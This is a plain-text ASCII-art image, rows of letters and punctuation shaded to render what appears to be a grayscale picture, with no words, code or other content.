MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOxxxxxxxxxxxxxxxddxxxodXMWWWWW0:............,:oxO0KXXNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNNNXXKK0OOkxxdoc:,'...........';oOKXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNOxkxxxxxxxxxdxxxdxxxdlxNWWWNXkc...........':ldk0KXXNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNNNXXXK00Oxdol:,'.......'',:d0XWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN0kkkxxxxxxxxxxxxdxxxdlkNNNNKd;..........;cdkO0KXNNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNNNXXXK00Okxo:'.......',,ckXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN0kkkxxxxxxxxxxkxxxxxdlONNKd;..........,lxxO0KXNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNNNXXXXKK0x:........'';xXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0kkkkkxxxxxkkxkkxxxxoo0N0:..........'cdkO0KNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNNNNNNNXKOo,.........;xXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0kOkkkkkkkkkkkkkxxxxooKKc..........;ok0KXXNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNNNNNNX0x;........'cxKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMW0OOOkkkkkkkkkkkkkkkkookl..........:x0KXXNNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNNXKx:........'cx0NWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWKOOkkkkkkkkkkkkkOOkxolc..........;xKXXXNNNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNNXKx;........,d0XWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWKOOOOOkkOOOkOOkkOOkxl,..........,oOXXXXNNNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNNXX0o,......''lOXNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWKOOOOOOOOOOOOOOOOkkd;...........:x0XXXXNNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNXXXKx:......''ck0NWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWK0OO0OOOOOOOOOOOOOkc...........,lkKXXXNNNNNWWWNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNNNNXXXXKkl,......'ckKXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWX00O0OOOOOOOOOkkOOx;...........:dOKXXNNNNNNNNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNNNNNNXXXXXKOo;.......;kNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWX00000OOOOOOOOkkkkl...........'cxOKXXNNNNNNNNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNNNNNNXXXXXXKOd:.......'xNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWX000000OOOOOOOOkOk:...........,lkKXXXXXNNNNNNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNNNNNNXXXXXXXXKkdc'.......dNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXK0000000000OOOkkd,...........cx0KXXXXXXNNNNNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWNNNNNNNXXXXXXXXKK0kdl,.......xWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXK0000000K000OOOxc...........,oO0KKXXXXKKKKKXXXNNNWWWWNNNNNWNNNNNNWWWWWWWWWWWWWWWWWWWWWWWWWWNNWWWWWWWWWWWWNNNNNNNXXXXXXXKKKK0kdl,......'xWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXKK000000000OOOkd;...........ck00KKK0OxdooooodxkOO00000OOkOKXKXXXXXXNNWWWWWWNWWWWWWWWWWNNNNNNNNNNNNNNNNNNNNNNNNXXXXXKKKKKKKKOkdl;......;0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXKKKK000000000OOx,..........,okO0KOdc;,'''''',,'',;;;::ccc:cdxkkkkOOXNNNNNNNNNNNNNNNNNNNNNNNNNNXXXXXKKKKK00OOOOOkxkO0KKKKKK0OOxo:......oNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWK0KKKK000KKKKK00x;..........;dO00d;......................',',;clooldOXXNNNNXNNNNNXXXXKKKXXXKKK0kxxdolloolcc::;;;;:ccldk0KKK0OOkdc'....'kWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWX0K0KK000KKKKKK0Ol..........ckOOo'............................';cc:cdOKXXXXXXXXXXK00kxddoodxxxo::,'''''.............',;coxO00Okxl'....,OWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXKKKKKKKKKKKKKK00d;........'o00d;'.'',,,,,;;;,,,''.............';:::lxOKKXXXXXXKKkdolccc:,;cc:,'.......................',cxO0OOko,....:KWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXKKK0KKKKKKKKKKK0dll;;;....,dkxc;,,;:c::;::c::;:::;,,'''''''..'',;;:coxOKK00KKK0Oko:,',,;,',''.................''''.'...';lxOOkkd,....oXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXKKKKKKKKKKKKKKKOlcko;'.....'''...'',;;;;;;;;,,,,,''''''''',,,,,;;;;codkOOOO0K00Oxo:,''','.............'',,;;:clcc:;,'''''':okkkd,...,OWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXKKKKKKKKKKKKKKKkl:l;..........;::codxxdoolcccccccc:;,,'''''.''',;;;:cldxkO00000Oxl:,'''........'',,''',,,;;;,,;;;;::;;,,,,,ckOko'...,xNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXKKKKKKKKKKKKKK0kc',,..'.'...,d0koddddoc;,',,,,,,;;::::ccc:::;,....';:loxO0KKKKKOxl;,''''''''''..'',,,,,,,,,,,;;;;;;;;,'....';:c;.....cOXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXKXKKKKKKKKKKKK0kc.........';:kKOxxxdoc;'........';lddolc:cc::cc:'...,coxOOOOOOOkdc;''''''......''',;:cccccccc::clooooolc:;;,..........cOXNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWNXXXKKKXXKKKKKK0xc,...... .;';OX00Okxol:;'.'....',;dKXK0kocclcccll:'...'''''''''''..........','...'',:oolc::;;:;,;:llollllldko,........'okXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNXXKKKXXKKKKKKK0o::,......',.;OKKKK0kdoll:;:,.....'o0XXKK0xolloodddl,....................';::,...,;;,:kKKOxoc,',,,;:cclloook0x;'.......,::OWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNXXXXKKKKKKKKKKOocoo:'....,,.ck0KXXK0Okkdoclc:;;;;cxO0000Okxxxddk0OOo....',;;;;,,'......;oc::;,,,'',';d00Okxdl:;,;::cloddxxO0x,.,......'.;OWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNXXXXXKXKKKKKKKOoxOo:'....,;,dO0KXXXXKK0kdlclloooodxxxxkkkxkkkOO00OOx,...;:clolc:c;....,xOxxddoc:::;;codoodoolccccllodkOOOO00k;.,'......;dKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNXXKXXXKXXKKKKKOok0l'.....':ck0KXXXXKK0OxooodxkkkxxxxxddddddxxkOO0O0k;...;x0KXKOxc'....:O00Okxdoollllooodooolcccldxkk0KKKKK00x:.;,.....,:kXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNXXXXXKXKKKKKKkoOKd;......:okKKXXKK0OkkkkkxxxxkkkkkkkkkkOOOO00KKKKKk,..'xNWWWWWNO;....ckkxddoooodddxxxxkkxxxdolodk0KXXNNXX0Ox:,:'....';ckNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNXXXXXKKKKKKkd0Xx;'''...,dOKKKKK00KKKKKKKKK000KKKKKKKKKKKKXXXXXXXx' .lKWWWWWWWNd....cOOOkkkkOOOOO000000OOOOOOOkkkO0KKXXX0Okc;:......;dKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWNXNXXXKKXKKKKKKddKKxc:,..''.lO00KKXXXXNNNNNNNNNNNNNXXXXXXXNNNNNXXXXKl..:0NNWWWWWWNKc...c0KKKKKKKKKKKKKXXKKKKXXXXXXKK00OOO00OOkoc;.....,oXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWNXXXXKKKXXKKKX0dxXX0dlc,.,c,'x00KXXXXNNNNNNWNNNNNNNNNNNNNNNNNNXXXXXk'.,kXNNWWWWWWNNO,..;kKKXXXXXXXXXXXXXXXXXXXXXXXXXXKK0Okxxkkdc...',,ckNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWNXXXXKKXXKKKKX0dkNNXOdo:''oo';kKKXXXXNNNNNNWWWWNNNNNNNNNNNNNNNNXXXO;.,kXNNWWWWWWWNNXo,..dKKXXXNNNNNNXXXXXXNNNNNXXNXXXXKK0Okkkkd,.,',,;l0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWNXXNXKKKXKKKKKOdONNNKkd:'':xd,;xKKXXXNNNNNWWWWWWWWWWWWWWNNNNNXXXXO;.;kXNNNWWWWWWWNNNKOc.;kKKXXNNNNNNNNNNNNNNNNNNNNNNXXK00Okxxx:':;';ccdXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWNXNNXKKKKKK0KKkd0NNNXOxc..,oOk:,o0XXNNNNNNNNNNNWNNWWNNNNNNNNNXXXx,.c0NNNNWWWWWWWWWWNNNKc.:OKKXXNNNNNNNNNNNNNNNNNNNNXXXK0OOkxx:'cc,,cld0NWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXXXXKKKKKKK000xxKNNNXOxc'..ck00d::dKXNNNNNNNNNNNNNNWNNNNNNNNNXOc';dKNNWWWWWWWWWWWWWWNNNKc.:kKKXXNNNNNNNWWWWWWWWNNNNXXK0OOOOx:,cl;',cokXNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXKXXKKKK0KK00OdxXNNNK0d:'..,d0KK0xllox0XNNNNNNNNNNNWWWWWNNNKxc;:dKNNNWWWWWWWWWWWWWWWWWNNKl',o0XXNNNNNNWWWWWWWWWNNNNNXK0O0Od::ooc;,;:oOXNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXKXKKKKK00K00OdkNNNNKkoc,'..lO00KKXKkdodddxkOO00000000OkxdlccoOXNNNNNNWWWWWWWWWWWWWWNNNNXKkc,:d0XNNNNNNWWWWWWNNNNNNXXK0kdc:okxc,,;;:dKNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXKXKKKK000K00OdONNNNXOxd:;'.:k000KKXXXXK0kkxxxxdddddddddxxOO0XNNXXXXXXNNNWWWWWWWWWNNNNNXXXK0xc;:ldk0XXNNNNWWWNNNNXK0kdolldkkkl,'',:oONWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWNKXKKKK0KKK00kd0NNNNN0kd:;'.,dO00KKKXXXKKKK0KK00KKKKKKKKKKOk0XXXKKK0OOO0KXNNNNNNNNXKK00000000kkkdolodoooddddddddddooodxOOOkko;''';lxKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXKKK0KK000000xdKNNNNNXOl'...'ck000KKXXXXXKK00OkkkxxxxxkO000OO00Okxxddoodxk00KKK00Oxdooodddxkkkk0000000OOkxxxxxkkO000OOOOOkkxc,..';o0NWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWX0KXK0000OO00dxXNNNNXX0d,....;dO00KKXXXNNXXXXXXKK0OO00KXXNNX0xolc;,,,;:cllodddddollcc::ccclodxkOOOkxxxddddoooddddxxkkkkkkkxo;'..':xXWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWXKKXK0000OO0OdkNNNWWNXOd:....;okO0KKXXNNNNNNNXKK0KKXXNNNNNXXKkl;'...''',;:::::::;;,,'''',;:lx0KKKK0OkxxkOO00000OOOOOOOOkkkdc'....c0WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWX0KK00000OO0koONNNWNNX0xc;'..,lkO00KXXNNNNXXKOkk0KXXNNNNNXXK0koc,'',,,;;;;;;;;;,'........,:oOKXXXXXXXK0O0KXXXXXXXXXK00OOkxl;'..':xKWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWX0000OO0OOOOxo0NNNNWNX0o::'..,lxxkOKXXNNXXKOddkKKKKXXKXXXKK0kdolcc:::::::::;,,'........',:ldkO0KXXXXXXK0OkO0KKXXXXK000Okxo:,.'',dk0NWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWX0000OkOOOOOddKNNNWWNN0dc;'..':ldxk0XXNXXX0doxOOkxxkkOOOOkxxdoooooolccc::::;,''''.'''',;:clodxkkO000000KKOkkO0KKKK0OOOkko:,'''',lkKNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWX0000OOkkOOkoxKNNNNWNXKOl,'''';coodk0XNXXKklloolcclllooddddddooodxdoolc:::::;;;::;;;:::::clloooodxkkkxxO00OkO0KXKK0Okkxdl;,,,'';xKXNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWX000OOOkkkOkoxXXXNNNNNKx:,..'.':ccldkKXXXKxlll:,,,,;;:clddoddoooxkxxdlc::clllllodolllllcclllollcloxoollldk0OOKKXK0OOkxoc;,,,''';dKNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWK000OOOkkkOxokKXXXNNNXKkc'',..',;::cdOKXXKxc::,'''''',:cccloooooxOkkkxoloxxxxddxOkdxdolllooloolccccc::cccdkO0KXXK0Okxol:,''..';:lONWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWKO0OkkkkkkOxokKKXXXXXNXk:,'....',;::cdk0XKkc;;,',,'',,;;;;:clllodkkkO0OkOKK0OOOO0kxxdooooolllc::;,',,;;;:lxOKXXNX0kxoc:,''...'cdxKNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWKOOOkkkkxxkdoO00KXXKKK0x:,'.....',;,,:cdOKOdl::;:codxxkxdollllllooooodddxkkkddddoooolllcc:::;,,''',,,;;;;cdOKKKXKOxo:;,'...'',:x0XNNWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
